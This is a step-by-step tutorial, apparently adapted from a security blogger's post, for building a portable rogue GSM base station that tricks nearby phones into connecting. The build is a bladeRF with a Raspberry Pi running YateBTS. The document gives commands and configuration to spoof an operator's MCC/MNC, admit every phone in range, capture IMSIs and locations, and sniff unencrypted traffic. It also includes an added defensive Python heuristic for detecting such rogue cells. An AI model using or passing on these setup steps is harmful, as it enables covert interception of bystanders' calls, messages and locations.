A GSM Base Transceiver Station (BTS) is the piece of equipment that links mobile phones to the mobile provider's network. By building our own, we can trick mobile phones into connecting to it. Such a BTS can be configured to capture the IMSI, location and other data of the phones that connect to it. This is exactly what the government does with its "stingray" devices. Except ours costs under $600!
EvilSocket has done a great job in his post "How to Build Your Own Rogue GSM BTS for Fun and Profit". But we will go a little further with our setup.
In order to build your BTS you’ll need the following hardware:
- A bladeRF x40. (USD $420)
- A bladeRF case. (USD $20)
- Two Quad-band Cellular Duck Antennas SMA. (USD $15)
- A Raspberry Pi 3 kit w/ microsd. (USD $70)
- An Anker Astro E7 26800mAh Portable Charger. (USD $55)
All for a grand total of USD $580... Not bad considering the government bills taxpayers for over $200,000 a pop for one of these.
Install the latest Raspbian image to the microSD card, boot the RPi, configure either WiFi or ethernet, and so on; at the end of this process you should be able to SSH into the RPi.
Next, install a few dependencies we're going to need soon:
sudo apt-get install git apache2 php5 bladerf libbladerf-dev libbladerf0 automake
At this point you should already be able to interact with the bladeRF. Plug it into one of the USB ports of the RPi, and dmesg should show something like:
[ 2332.071675] usb 1-1.3: New USB device found, idVendor=1d50, idProduct=6066
[ 2332.071694] usb 1-1.3: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[ 2332.071707] usb 1-1.3: Product: bladeRF
[ 2332.071720] usb 1-1.3: Manufacturer: Nuand
[ 2332.071732] usb 1-1.3: SerialNumber: b4ef330e19b718f752759b4c14020742
Start the bladeRF-cli utility and issue the version command:
pi@raspberrypi:~ $ sudo bladeRF-cli -i
bladeRF> version
  bladeRF-cli version: 0.11.1-git
  libbladeRF version: 0.16.2-git
  Firmware version: 1.6.1-git-053fb13-buildomatic
  FPGA version: 0.1.2
bladeRF>
IMPORTANT: Make sure you have these exact versions of the firmware and the FPGA; other versions might not work in our setup.
Download the correct firmware and FPGA image.
Now we're going to install Yate and YateBTS, two open source projects that let us build the BTS itself.
Since I spent a lot of time trying to figure out which specific version of each was compatible with the bladeRF, I’ve created a github repository with correct versions of both, so in your RPI home folder just do:
git clone https://github.com/evilsocket/evilbts.git
cd evilbts
Let’s start building both of them:
cd yate
./autogen.sh
./configure --prefix=/usr/local
make -j4
sudo make install
sudo ldconfig
cd ..
cd yatebts
./autogen.sh
./configure --prefix=/usr/local
make -j4
sudo make install
sudo ldconfig
This will take a few minutes, but eventually you’ll have everything installed in your system.
Next, we’ll symlink the NIB web ui into our apache www folder:
cd /var/www/html/
sudo ln -s /usr/local/share/yate/nib_web nib
And grant write permission to the configuration files:
sudo chmod -R a+w /usr/local/etc/yate
You can now access your BTS web ui from your browser:
Time for some configuration now!
Open the /usr/local/etc/yate/ybts.conf file either with nano or vi and update the following values:
Radio.Band=900
Radio.C0=1000
Identity.MCC=YOUR_COUNTRY_MCC
Identity.MNC=YOUR_OPERATOR_MNC
Identity.ShortName=MyEvilBTS
Radio.PowerManager.MaxAttenDB=35
Radio.PowerManager.MinAttenDB=35
You can find valid MCC and MNC values here.
Now, edit the /usr/local/etc/yate/subscribers.conf:
WARNING Using the .* regular expression will make EVERY GSM phone in your area connect to your BTS.
In your NIB web ui you’ll see something like this:
In the "Tapping" panel you can enable tapping for both GSM and GPRS. This will basically "bounce" every GSM packet to the loopback interface, and since we haven't configured any encryption, you'll be able to see all the GSM traffic by simply tcpdump-ing your loopback interface :D
Finally, you can start your new BTS by executing the command (with the bladeRF plugged in!):
sudo yate -s
If everything was configured correctly, you’ll see a bunch of messages and the line:
Starting MBTS...
Yate engine is initialized and starting up on raspberrypi
RTNETLINK answers: File exists
MBTS ready
At this point, the middle LED for your bladeRF should start blinking.
Now phones will start to connect automatically. This happens because of the GSM implementation itself:
- You can set whatever MCC, MNC and LAC you like, effectively spoofing any legit GSM BTS.
- Each phone searches for a BTS of its operator and selects the one with the strongest signal … guess which one will be the strongest? Yep … ours :D
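As an added defensive example (not from the original post or from the Yate/YateBTS projects), here is a rogue-cell heuristic run over constructed cell-scan records. It looks for the three traits the setup above produces from a phone's point of view: the operator's MCC/MNC paired with a LAC/Cell ID the operator does not own, an attach that negotiated no ciphering, and a signal far above the area's baseline. The MCC/MNC, cell IDs, signal levels and the 20 dB margin are assumptions.

```python
from dataclasses import dataclass
from typing import List, Set, Tuple

@dataclass(frozen=True)
class CellObservation:
    mcc: str        # Mobile Country Code as broadcast by the cell
    mnc: str        # Mobile Network Code as broadcast by the cell
    lac: int        # Location Area Code
    cid: int        # Cell ID
    rssi_dbm: int   # received signal strength in dBm
    cipher: str     # ciphering negotiated at attach; "A5/0" means none

CellKey = Tuple[str, str, int, int]

def rogue_indicators(obs: CellObservation, known_cells: Set[CellKey],
                     baseline_rssi: int) -> List[str]:
    """Return the reasons an observed cell looks like a rogue BTS."""
    reasons = []
    if (obs.mcc, obs.mnc, obs.lac, obs.cid) not in known_cells:
        # A spoofed cell copies MCC/MNC but its LAC/CID is not in the operator's list.
        reasons.append("LAC/CID not in the operator's known cell list")
    if obs.cipher == "A5/0":
        # A BTS with no encryption configured leaves traffic in the clear.
        reasons.append("attach negotiated no ciphering (A5/0)")
    if obs.rssi_dbm >= baseline_rssi + 20:
        # A nearby transmitter wins cell selection by being the strongest signal.
        reasons.append("signal far above the area baseline")
    return reasons

def find_suspect_cells(observations: List[CellObservation], known_cells: Set[CellKey],
                       baseline_rssi: int, min_hits: int = 2):
    """Flag cells that match at least min_hits of the indicators."""
    suspects = []
    for obs in observations:
        reasons = rogue_indicators(obs, known_cells, baseline_rssi)
        if len(reasons) >= min_hits:
            suspects.append((obs, reasons))
    return suspects

# Constructed sample data: placeholder MCC/MNC ("001"/"01"), two known operator
# cells, and one scan entry that shows all three traits described above.
KNOWN_CELLS: Set[CellKey] = {("001", "01", 4321, 11001), ("001", "01", 4321, 11002)}
SCAN = [
    CellObservation("001", "01", 4321, 11001, -82, "A5/1"),
    CellObservation("001", "01", 4321, 11002, -91, "A5/1"),
    CellObservation("001", "01", 1000, 1, -48, "A5/0"),
]

if __name__ == "__main__":
    for obs, reasons in find_suspect_cells(SCAN, KNOWN_CELLS, baseline_rssi=-85):
        print(f"suspect cell LAC={obs.lac} CID={obs.cid}: {'; '.join(reasons)}")
```

The known-cell list would normally come from the operator or from a baseline survey of the area; a single indicator on its own is weak evidence, which is why the check requires two.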
Here's a picture taken from my Samsung Galaxy S6 (using the Network Cell Info Lite app), which automatically connected to my BTS after 3 minutes:
From now on, you can configure the BTS to do whatever you want … either act as a "proxy" to a legit SMC (with a GSM/3G USB dongle) and sniff the unencrypted GSM traffic of each phone, or create a private GSM network where users can communicate for free using SIP. Refer to the YateBTS Wiki for specific configurations.
Oh and of course, if you plug the USB battery, the whole system becomes completely portable :)